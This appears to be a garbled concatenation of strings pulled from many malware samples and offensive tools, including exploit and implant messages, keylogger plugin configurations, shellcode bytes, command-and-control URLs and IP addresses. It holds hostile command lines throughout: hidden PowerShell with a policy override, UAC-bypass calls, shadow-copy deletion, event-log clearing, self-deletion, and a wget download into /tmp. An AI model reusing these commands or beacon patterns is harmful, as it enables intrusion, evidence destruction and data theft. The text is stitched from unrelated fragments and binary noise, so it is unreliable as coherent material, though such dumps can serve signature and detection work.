[-] Failed to mmap file: %s[!] Value has size of 0!forceprismheader[+] looking for vulnerable socketcan't use 32-bit exploit on 64-bit target[+] %s socket ready, exploiting...[!] nothing looks vulnerable, trying everythingkernel has 4G/4G split, not exploitable[+] kernel stack size is %d[-] Failed to Prepare Payload!ShellcodeStartOffset[*] Waiting for AuthCode from exploit[-] Connection closed by remote host (TCP Ack/Fin)[!]Warning: Error on first request - path size may actually be larger than indicated.<http://%s/%s> (Not <locktoken:write1>) <http://%s/>[+] Target is %s[-] Error appending shellcode buffer[-] Shellcode is too big[+] Exploit Payload Sent![+] Bound to Dimsvc, sending exploit request to opnum 29[+] Connected to target %s:%d[-] build_exploit_run_x64():[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)[%s] - Error building DLL loading shellcode[+] Shellcode Callback %s:%d[+] Exploiting Target[+] Ping returned Target architecture: %s - XOR Key: 0x%08X[.] Sending shellcode to inject DLL[-] Error setting ShellcodeFile name[-] Unable to connect to broswer named pipe, target is NOT vulnerable[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable[+] Bound to Dimsvc, target IS vulnerable[+] Target is vulnerable to %d exploit%s[!] A vulnerable target will not respond.[-] Target NOT Vulernable[-] Touching the target failed![-] OS fingerprint not complete - 0x%08x![*] Failed to detect OS / Service Pack on %s:%d[*] SMB String: %s (%s)[-] Get RemoteMOFTriggerPath error[-] %s - Target might not be in a usable state.[*] Exploiting Target[-] Encoding Exploit Payload failed![-] The target is NOT vulnerable[+] The target IS VULNERABLE[-] Are you being redirectect? Need to retarget?[+] IIS Target OS: %s[*] Summary: %d pipes found[+] Testing %d pipes[-] Error on SMB startup, aborting92a761c29b946aa458876ff78375e0e28bc8acb0h
@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"Logging out of WebAdmin (as target account)[+] Connected to the Registry Servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] CheckCredentials(): Checking to see if valid username/passwordError connecting to target, TbMakeSocket() %s:%d.NtErrorMoreProcessingRequiredCommand Format Error: Error=%xNtErrorPasswordRestriction
CM[+] Backdoor shellcode written[*] Attempting exploit method %dError: Could not calloc() for shellcode buffershellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04XGenerating shellcode([0-9a-zA-Z]+) OK LOGOUT completedError: Domino is not the expected version. (%s, %s)[-] Error: Exploit choice not supported for target OS!!Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed[-] Error: Backdoor not present on target***********    TARGET ARCHITECTURE IS X64    ************[+] \"TargetPort\"      %hu---<<<  Complete  >>>---[+] \"NetworkTimeout\"  %huF
Restart with the new protocol, address, and port as target.TargetPort      : %s (%u)Error: strchr() could not find '@' in account name.TargetAcctPwd   : %sCreating CURL connection handle...[+] Setting password : (NULL)[-] TbBuffCpy() failed![+] SMB negotiation12345678-1234-ABCD-EF00-0123456789ABValue must end with 0000 (2 NULLs)[*] Configuring Payload[*] Connecting to listener
FLogon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)[-] Could not set \"CredentialType\"-xd = dump archive data & store in scancodes.txt-
-xta = same as -xt but show special chars & store in keys_all.txt.?AVFeFinallyFailure@@(
C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTORsrc\\build\\Release\\dllConfig\\dllConfig.pdbGREATERDOCTOR [ commandline args configuration ]-useage: <scanner> \"<cmdline args>\"+daemon_version,system,processor,refid,clockUsage: %s typeofscan IP_address# scanning ip  %d.%d.%d.%d***** %s ***** (length %d)D$7P
D$>File too large!  Must be less than 655360 bytes.c:\\ntevt.pdbARASPVUAZAYAX_^]ZY[XH
H3Select * from Win32_Process\
Previous command: set injection processes (status=0x%x)Secondary injection process is <null> [no secondary process will be used]Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> E: Execute a Command on the ImplantFullThreadDump.classThreadMonitor.classDeadlock$DeadlockThread.class*
0M1U1Z1p1
_BzWKJD+D$ll
\$mD$Tc
D$ViD$\l
D$^* The target is IIS 6.0 but is not running content indexing servicess,--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sLBy default, the shellcode will attempt to immediately connect s$UNEXPECTED SHELLCODE CONFIGURATION ERRORs
\\\\.\\%ls6\"6<6C6H6M6Z6f6t6Updates the name of the dll or executable in the resource file*NOTE: SetResourceName does not work with PeddleCheap versions2 = [appinit.dll] level4 dll1 = [spcss32.exe] level3 exehZwLoadDriver
3Select * from Win32_Shares
\\\\%ls\\%lsdumpel -f file [-s \\\\server]records will not appear in the dumped log.obj\\i386\\Dumpel.exeDUMPEL Usage:    wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOww+w;w2w0w6w4w.w(wRw
\$`HE3
_PacketNDISRequestComplete@12\"_LDNdis5RegDeleteKeys@4
S-%u-%u$9e
D$D$NA
D$A3&3.3<3A3F3K3V3c3m3
running on this computer!- Promiscuous (capture all packets on the network)Active filter for the adapter:
EUSAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)s
raw_open CreateFile error\
K%02u:%02u:%02u.%03u-%4u: * PrivateEncrypt -> PublicDecrypt FAILEDSELECT ProcessId,Description,ExecutablePath FROM Win32_Process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowMutexSystem\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B9800000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]The output payload \"%s\" has a size of %d-bytes.ERROR: fwrite(%s) failed on ucPayloadLoad and execute implant within the existing threaddriver startDeviceIoControl Error: %dPhlookUSAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d\
hKeAddSystemServiceTablehPsDereferencePrimaryTokenC
sys\\mstcp32.dbg%
Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]key does not exist or pinging w2k systemRpcProxy=255.255.255.255:65536.dllfDKhsppxuD$8.exe\
-PATHDELETED-(
NULLFILENAMEUSAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]You may enter between 1 and 6 ports to change the defaults.SPRQWVUsage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modeBad mode, should be 'd' or 'e'wshtcpip.WSHGetSocketInformation\\\\.\\%hs.?AVResultIp@Mini_Mcl_Cmd_NetConnections@@C
\$WD$mL
D$o* Encrypted log found.  An encryption key must be providedencryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'(
Causes: Firewall,Machine down,DCOM disabled\\not supported,etc.7\"7(7/7>7O7]7o7w7@P
363<3S3c3l3q3v3{33!3%3)3-3135393@5
0#0)0/050;0M0Y0h0|0PQRAPAQSTUVWARASATAUAVAWSQRUWVAWAVAUATASARAQAPiijymqpAWAVAUATASARAQIWARASATAUAVM
H3*NOTE: This version of SetCallback does not work with PeddleCheap versions priorUSAGE: SetCallback <input file> <output file>DFReader.exe logfile AESKey [-j] [-o outputfilename]Double Feature Target VersionDoubleFeature Process ID
Target is share nameCould not make UdpNetbios header -- bailingRequest non-NT session key* Listening Post DLL %s() returned error code %d.WsaErrorTooManyProcessesServerErrorBadNamePassword*
%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat<PE path> - the path to the PE binary to which to add the resource.Unable to get path for target binary.Fragment: Packet too small to contain RPC headerFragment pickup: SmbNtReadX failedI
Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08XSending Implant Payload.. cEncImplantPayload size(%d)Target is NOT vulnerable** CreatePayload ** - EXCEPTION_EXECUTE_HANDLERSkip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored.ERROR: pGvars->pIntRideAreaImplantPayload is NULLDEC Pathworks TCPIP service on Windows NT<\\\\__MSBROWSE__> G<IRISNAMESERVER>** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLERBinding to RPC Interface %s over named pipeERROR: TbMalloc() failed for encoded exploit payload** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLERSending Implant Payload (%d-bytes)ERROR: Encoder failed on exploit payloadERROR: VulnerableOS() != RET_SUCCESSERROR: Connection terminated by Target (TCP Ack/Fin)Target did not respond within specified amount of time# Scan for windows boxesGoing into send# Does not workYou are the weakest link, goodbyerpc   Scan for RPC  folksp
cnFormSyncExFBCcnFormVoidFBC
yyyyyyyyyyyyyyyy?a73957838_2@@YAXXZ?a84884@@YAXXZ?b823838_9839@@YAXXZ?e747383_94@@YAXXZ?e83834@@YAXXZ?e929348_827@@YAXXZ7
StringIndexi
msvcp5%d.dllactxprxy.GetProxyDllInfoactxprxy.DllGetClassObjectactxprxy.DllRegisterServeractxprxy.DllUnregisterServeryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy191H1a1November ababababababJanuary October September c:\\users\\rmgree5\\m
svrg.pdbW32pServiceTableIn formaReleaseFastMutexR0omp4arH.text\
GetMappedFilenameWALL_FIREWALLS@
Failed to get Windows versionl
\\\\%s\\mailslot\\%s%d-%d-%d %d:%d:%d Zlsasrv32.dll!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%s %02x %sVIEWERS5
x:\\fanny.bmpd:\\fanny.bmpc:\\windows\\system32\\kernel32.dllSystem\\CurrentControlSet\\Services\\USBSTOR\\EnumSystem\\CurrentControlSet\\Services\\PartMgr\\Enum\\AGENTCPD.DLLagentcpd.dllPADupdate.exedll_installer.dll\\restore\\Q:\\__?__.lnkSoftware\\Microsoft\\MSNetMng\\shelldoc.dllfile size = %d bytes\\MSAgentGlobal\\RPCMutexGlobal\\DirectMarketingnls_933w.dllB
KfAcquireSpinLockHAL.dllREAD_REGISTER_UCHAR@
$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaO
hnetcfg.HNetGetSharingServicesPagehnetcfg.IcfGetOperationalModehnetcfg.IcfGetDynamicFwPortshnetcfg.HNetFreeFirewallLoggingSettingshnetcfg.HNetGetShareAndBridgeSettingshnetcfg.HNetGetFirewallSettingsPagei386\\DesertWinterDriver.pdbPerforming UR-specific post-install...Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!STRAITSHOOTER30.exestandalonegrok_2.1.1.1M
p32.sysunilay.dllI
sys\\tdip.dbgdip.systdip.pdbm
msrstd.pdbm
Parmsndsrv.dbgm
\\systemroot\\C
volrec.pdbV
Backsnarf_AB25-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo.Error from ourtn, did not find keys=target in tn.spayedourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s#Provide hex or EP log as command-line argument or as inputprint \"Gimme hex: \";if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {if ($_ =~ /InstallDate/) {if (not($cmdInput)) {print \"$hex in decimal=$dec\\n\\n\";%s: abort.  Code is %d.  Message is '%s'%s: %li b (%li%%)no winsock%s: %s file '%s'peer: connectread: write%s: done!recv_ack: %s: Service not supplied by providersend_request: putmsg \"%s\": %sport undefinedrecv_ack: %s getmsg: %s>> %d -- %d%s [infile] [outfile] /k 0x[%i character hex key] </g>File %s already exists.  Overwrite? (y/n) Random Key : 0xdone (%i bytes written).%s --> %s...
load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookieValid commands are: SMAC, DMAC, INT, PACK, DONE, GOinvalid format suggest DMAC=00:00:00:00:00:00SMAC=%02x:%02x:%02x:%02x:%02x:%02xNot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** Target may be susceptible to FALSEMOREL      ****** Target is susceptible to FALSEMOREL          ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"ERROR:$line is not a valid port\";$dstport=hextoPort($dstport);sub hextoPort$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"ERROR:$line is not a valid address\";print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoIP($ARGV[0]);Generates the persistence file name and prints it out.Name:   A hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,CNAME,1800,host.badguy.net \\\\What is the name of your PBD:You are now ready for a ScreamPlowBinStore enabled implants.Active connections will be maintained for this tunnel. Timeout:%s: compatible with BLATSTING version 1.2can't find target version module!class Payload:Connection timed out. Only a problem if the callback was not received.Could not reliably detect cookie. 
Using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textIMPLANTKEEPGOINGupgrade_implantUnable to save off predefinedScans directoryRe-orders the networkProfiler scans so they show up in order in the LPfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)convert an XML file generated by the BLATSTING sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp BGLEE-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<IPaddr>:onfigERROR: failed to open %s: %d__libc_start_main@@GLIBC_2.0serial number: %sstrerror@@GLIBC_2.0ERROR: mmap failed: %dSD_processControlPacketEncryption_rc4SetKey^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nThis program will configure a JETPLOW Userarea file.Error running config_implant.NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION First IP address for beacon destination [127.0.0.1]Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! LOADEDpageTable.chandler_readBIOSmacdef init > /tmp/.netrc;/usr/bin/wget http://HOME=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_nameWhat is the name of your implant:killall thttpdcopy http://<IP>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 -t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect portthis operation is complete, BananaGlee willcd /current/bin/FW/BGXXXX/Install/LPprofProcessPacketgetTimeSlotCmdHandlergetIpIpCmdHandlerprofStartScantmpData.1resetCmdHandlercd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow***** Please place your UA in /current/bin/FW/OPS *****ln -s ../jp/orig_code.bin orig_code_pixGen.bin*****             Welcome to JetPlow              *****get_lsl_interfacesencryptFC4Payloadbeacon_getconfigFormBeaconPacketbeacon_reconfiguredumpConfiggetstatusHandlerxtractdataTo disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dCould not connect to target device: %s:%d. Please check IP address.command data size is invalid for an exec cmdA script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but maExecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]Execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] Execute code.Execute 0x%08x with args (%08x): [y/n]dump_value_LHASH_DOALL_ARGEggcode is complete. Pass execution to it? [y/n]required by SECONDDATEhelp='Output file name (optional). 
By default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readFlashHandlerflashRtnsPix6x.cfix_ip_cksum_incrwriteFlashHandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesDLT %d is not one of the DLTs supported by this deviceUsage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the confraise Exception, \"Must supply both a config file and implant file.\"This is wrapper for Store.py that FELONYCROWBAR will use. Thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x  \" % (lead,i),print >>out, \"%02X\" % ord(x[i+j]),print >>out, sane(x[i:i+16])Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.ScmosReadBytechecksumAreaConfirmed.0writeSpeedPlow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. If you want to uninstall,The active module(s) on the target are not meant to be persistedLP.c:pixSecurity - Improper number of bytes read in Security/Interface InformationLP.c:pixSecurity - Not in SessiongetModInterface__preloadedModulesshowCommandsreadModuleInterfaceWrapping_Not_Necessary_Or_Wrapping_OkGet_CMD_ListLP_Listen2killCmdListModule and Implant versions do not match.  
This module is not compatible with the target implant%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log%s/BF_%04d%02d%02d.log%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin* Not attempting to execute \"%s\" commandTERMINATING SCRIPT (command error or \"quit\" encountered)execute code in <file> passing <argX> (HEX)* Use arrow keys to scroll through command historypitCmd_processCmdLineexecute all commands in <file>__processShellCmdpitTarget_getDstPort__processSetTargetIpLogging commands and output - ONThis command is too dangerous.  If you'd like to run it, contact the development teamImplant Version-Specific Values:This function should not be used with a Netscreen, something has gone horribly wrongcreateSendRecv: recv'd an error from the target.Error: WatchDogTimeout read returned %d instead of 4Command has not yet been codedBeacon Domain  : www.%s.comThis command can only be run on a PIX/ASAWarning! Bad or missing Flash values (in section 2 of .dat file)Printing the interface info and security levels. PIX ONLY.incomplete and must be removed manually.)%s: recv'd an error from the target.Unable to fetch the address to the get_uptime_secs function for this OS versionupload/activate/de-activate/remove/cmd function failedDo you wish to activate the implant that is already on the firewall? (y/n): There is no implant present on the firewall.Implant Version :%lx%lx%lxYou may now connect to the implant using the pbd idkeyNo reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcPBD_GetVersionpbd/pbdEncrypt.binpbd/pbdGetVersion.pktpbd/pbdStartWrite.binpbd/pbd_setNewHookPt.pktpbd/pbd_Upload_SinglePkt.pktUnable to fetch hook and jmp addresses for this OS versionCould not get hook and jump addressesEnter the name of a clean implant binary (NOT an image):Unable to read dat file for OS version 0x%08lxInvalid implant fileprint \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"Must be overriden if the target will be touched.  
Base implementation should not be called.\")@overridable(\"Must be overriden.  Base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateFlingOnException:print \"[-] keyboard interrupt before response received\"if self.terminateFlingOnException:print 'Debug info ','='*40Modules persistence file written successfullyModules persistence data successfully removedNo Modules are active on the firewall, nothing to persistError while attemping to persist modules:Error while reading interface info from PIXLP.c:pixFree - Failed to get responseWARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting defaultUnable to fetch config address for this OS versionLP.c: interface information not available for this session[%s:%s:%d] ERROR: extract_fgbgWARNING:  Session may not have been closed!EXEC Packet ProcessedFailed to insert the command into command list.Send_Packet: Trying to send too much data.payloadLength >= MAX_ALLOW_SIZE.Wrong Payload SizeUnknown packet received......Returned eax = %08xlogging.error(\"       Perhaps you should run with --scan?\")logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - EPBA: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - EPBA: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
.textZXUR
30.40.50.60:9342|###[ SNMPresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] Executing:  extrabaconappended AAAADMINAUTH_ENABLE payload/BananaGlee/ELIGIBLEBOMBProtocol must be either http or https (Ex: https://1.2.3.4:1234)
+185.100.84.13458.49.58.58218.1.98.203187.33.33.8185.86.148.22745.32.129.18523.227.196.217p
<configFileName>20121_cmdDef.xml</configFileName><name>20121.dll</name><codebase>\"Reserved for future use.\"</codebase><plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS<platform type=\"1\"></plugin></pluginConfig><pluginConfig></platform></lpConfig><lpConfig>20123.dllk
IoFreeMdlKfReleaseSpinLock<shortDescription>Keystroke Collector</shortDescription>This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description><commands/></version><associatedImplantId>20121</associatedImplantId><rightsRequired>System or Administrator (if Administrator, I think the DriverIns<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64<projectpath>plugin/Collection</projectpath><dllDepend>None</dllDepend><minorType>0</minorType><pluginname>E_QwertyKM</pluginname></comments><comments><majorType>1</majorType><files>None</files><poc>Erebus</poc><team>None</team><?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?><pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend><plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsiWarriorPride\\production2.0\\package\\E_Wzowski<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -<configFileName>20123_cmdDef.xml</configFileName><name>20123.sys</name><codebase>/bin/i686-pc-win32/debug</codebase>\
Failed to send the EQwerty_driverStatusCommand to the implant.-
The implant failed to return a valid status-
This PPC gets the current keystroke log.This command will add the given WindowTitle to the list of Windows to log keys fThis command will remove the WindowTitle corresponding to the given window titleThis command will return the current status of the Keyboard Logger (Whether it iThis command Toggles logging of all Keys. If allkeys is toggled all keystrokes w<definition>Turn logging of all keys on|off</definition><name>Get Keystroke Log</name><description>Keystroke Logger Lp Plugin</description><definition>display help for this function</definition>This command will switch ON Logging of keys. All keys taht are entered to a actiSet the log limit (in number of windows)<example>qwgetlog</example><aliasName>qwgetlog</aliasName><definition>The title of the Window whose keys you wish to Log once it becomes aThis command will switch OFF Logging of keys. No keystrokes will be captured<definition>The title of the Window whose keys you no longer whish to log</defin<command id=\"32\"><command id=\"3\"><command id=\"7\"><command id=\"1\"><command id=\"4\"><configFileName>20120_cmdDef.xml</configFileName><name>20120.dll</name><shortDescription>Keystroke Logger Plugin.</shortDescription><message>Failed to get File Time</message><description>Keystroke Logger Plugin.</description><message>Failed to set File Time</message></commands><commands><associatedImplantId>20120</associatedImplantId><message>No Comms. with Driver</message></error><message>Invalid File Size</message><platforms>Windows (User/Win32)</platforms><message>File Size Mismatch</message><projectpath>plugin/Utility</projectpath><pluginsDepend>None</pluginsDepend><pluginname>E_QwertyIM</pluginname><rightsRequired>None</rightsRequired><code>00001002</code><code>00001001</code>FqkVpTvBwTrhPFjfFF6ZQRK44hHl26
YdqrChZonUFE
DanderspritzDanderSpritzChimneyPool AddresGetting remote timeRETRIEVEDAdded Ops library to Python search pathtarget: z0.0.0.1Psp_AvoidancePasswordDumpInjectDllEventLogEditProcessModifyMcl_NtElevationMcl_NtNativeApiMcl_ThreatInjectMcl_NtMemoryvailablezSfouglr|||Command executed successfully\\Release\\Bot Fresh.pdbC
Bots\\Bot5\\x64\\ReleaseBot5\\Release\\Ism.pdbBot\\Release\\Ism.pdb\\Bot Fresh\\Release\\Bot/
raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:SaturdayS
F:\\Projects\\Bot\\Bot\\Release\\Ism.pdbC
powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuserpowershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"c:\\windows\\temp\\tmp8873taskkill /im winit.exe /finvoke-psuacme-method oobe -payload \"\"C
Invoke-bypassuacS
Microsoft\\Windows\\WinIt.exeMicrosoft\\Windows\\Tmp9932u1.bat\"cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCentercmd /a /c net user administrator /domain >>cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\========================== (Net User) ==========================j
D$$h6Q
@>process isn't exist<shell\\open\\command=\"System Volume Information\\USBGuard.exe\" installUser-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0webhp?rel=psy&hl=7&ai=
.?AVAgentKernel@@.?AVIAgentModule@@U
32.dadva
DispatchCommandDispatchEvent^
wevtutil clear-logvssadmin delete shadowsAGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9aWU3
>rkCYN
%ls_%ls_%ls_%d.~tmp
error 2005 recv from server UDP - %d\x0aerror 2004 send to TPS - %d\x0aerror 2003 recv from TPS - %d\x0aerror 2002 send to server UDP - %d\x0a
"JY8Aa
&%M/V;
EQW6SZ
?_5F}1
p#f"G7
,\9R`Ne
j{Wu/$
fC<XDw
cQwZR=
j#tC"(
Pnetids
ffffff
/zapoy/gate.php
fuckyou1xtool.exe\
setx TOR_CONTROL_PASSWORDmitmproxy0\\insert_cert.exeelevator.dllfail adding certDownloadingFilefail adding cert: %sInternetOpenA failC:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] LoaderConfig %ploader.objMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\Hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\D:\\Hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\Hellsing\\release\\claree:\\Hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g=vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==v
msger_install.dll
ex.dll
PROXY_INFO: automatic proxy url => %s PROXY_INFO: connection type => %d PROXY_INFO: proxy server => %s PROXY_INFO: bypass list => %s InternetQueryOption failed with GetLastError() %dD:\\Hellsing\\release\\exe\\exe\\\\Dbgv.sysXKAT_BINrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
common_loadDriver CreateFile error! common_loadDriver StartService error && GetLastError():%d! i
aPLib v0.43 - the smaller the bettermsrv.dll
